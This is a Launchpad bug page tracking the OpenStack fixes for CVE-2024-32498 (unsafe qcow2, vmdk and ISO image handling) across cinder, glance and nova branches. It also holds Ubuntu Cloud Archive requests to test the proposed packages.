Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to cinder (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923873
Committed: https://opendev.org/openstack/cinder/commit/0c3c65376f1aa46b35bedb4b59eac0bf8cc5979e
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 0c3c65376f1aa46b35bedb4b59eac0bf8cc5979e
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size avaialable without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    unmaintained/yoga only: The tests
    cinder.tests.unit.volume.drivers.test_quobyte.QuobyteDriverTestCase.
    * test_copy_volume_from_snapshot_not_cached_overlay
    * test_copy_volume_from_snapshot
    * test_copy_volume_from_snapshot_not_cached
    failed as convert_image mock was not called, remove this mock
    from yoga and on older branches.

    With older qemu installed one of the qemu-img
    create commands fails, let's skip it from unmaintained/yoga and
    below that in test_qcow2_safety_checks.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit 4aa6590a483901de64e0d162fff11f3d2d7f9977)
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (master)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923676
Committed: https://opendev.org/openstack/glance/commit/d8de63a5008b811f2e22cc5cdda59bd2cc05b207
Submitter: "Zuul (22348)"
Branch: master

commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2024.1)

Related fix proposed to branch: stable/2024.1
Review: https://review.opendev.org/c/openstack/glance/+/927459

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927459
Committed: https://opendev.org/openstack/glance/commit/eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2023.2)

Related fix proposed to branch: stable/2023.2
Review: https://review.opendev.org/c/openstack/glance/+/927568

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927568
Committed: https://opendev.org/openstack/glance/commit/5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)
    (cherry picked from commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to glance (stable/2023.1)

Related fix proposed to branch: stable/2023.1
Review: https://review.opendev.org/c/openstack/glance/+/927580

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/glance/+/927580
Committed: https://opendev.org/openstack/glance/commit/1427857a7d2a823bb754cf2f12f2b10e7b3df31d
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 1427857a7d2a823bb754cf2f12f2b10e7b3df31d
Author: Abhishek Kekane <email address hidden>
Date: Mon Jul 8 19:28:38 2024 +0000

    Add iso file format inspector

    This change excludes image conversion if source image
    format is ISO.

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: Id706480e31687d8ade6f7199b600aff3ad7c68f7
    (cherry picked from commit d8de63a5008b811f2e22cc5cdda59bd2cc05b207)
    (cherry picked from commit eed2a8aeb7a2e1ba47ff5642a346a97e85b6b0ff)
    (cherry picked from commit 5b4be5b6f2f67ec8e61bceff8c2ed79b870aace0)

Revision history for this message
James Page (james-page) wrote : Please test proposed package

Hello Martin, or anyone else affected,

Accepted cinder into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository.

Please help us by testing this new package. To enable the -proposed repository:

  sudo add-apt-repository cloud-archive:ussuri-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision.

Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance!

tags: added: verification-ussuri-needed
Revision history for this message
James Page (james-page) wrote :

Hello Martin, or anyone else affected,

Accepted glance into ussuri-proposed. The package will build now and be available in the Ubuntu Cloud Archive in a few hours, and then in the -proposed repository.

Please help us by testing this new package. To enable the -proposed repository:

  sudo add-apt-repository cloud-archive:ussuri-proposed
  sudo apt-get update

Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, and change the tag from verification-ussuri-needed to verification-ussuri-done. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-ussuri-failed. In either case, details of your testing will help us make a better decision.

Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance!

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/925592
Committed: https://opendev.org/openstack/nova/commit/e7c2281b03a9eb52281ada9273938ad0d5c52202
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit e7c2281b03a9eb52281ada9273938ad0d5c52202
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)
    (cherry picked from commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2)
    (cherry picked from commit e8f00617ed319aa37f6946cf10883eef6d180612)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/925594
Committed: https://opendev.org/openstack/nova/commit/76c43c4c56221cb836cf07b2df749cd94ec276e1
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 76c43c4c56221cb836cf07b2df749cd94ec276e1
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)
    (cherry picked from commit 47428f6caf503b94583dac614b59971f60a0ba9c)
    (cherry picked from commit 11613e7b3244958fa8d0b5253a185287d1ade2d8)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923307
Committed: https://opendev.org/openstack/glance/commit/63ac35e3248ceed3176a65cdccbbf06f69b3c58e
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 63ac35e3248ceed3176a65cdccbbf06f69b3c58e
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 11:20:48 2024 -0700

    Reject unsafe qcow and vmdk files

    This causes us to use the format inspector to pre-examine qcow and
    vmdk files for safe configurations before even using qemu-img
    on them.

    Depends-On: https://review.opendev.org/c/openstack/glance/+/923861
    Change-Id: I0554706368e573e11f649c09569f7c21cbc8634b
    Closes-Bug: #2059809
    (cherry picked from commit a95f335bca1dfdd1c904ae475e9fe8c6806f2c56)
    (cherry picked from commit 55fc42563818fcf88b474233df242a796c918b3a)
    (cherry picked from commit f1f53075d69a9a1c006b3e25506e30eb0210de1f)
    (cherry picked from commit c1c54abeaba91ae0030d4acf01a91339b60a2d7d)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix included in openstack/cinder 25.0.0.0rc1

This issue was fixed in the openstack/cinder 25.0.0.0rc1 release candidate.

Displaying first 40 and last 40 comments. View all 440 comments or add a comment.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.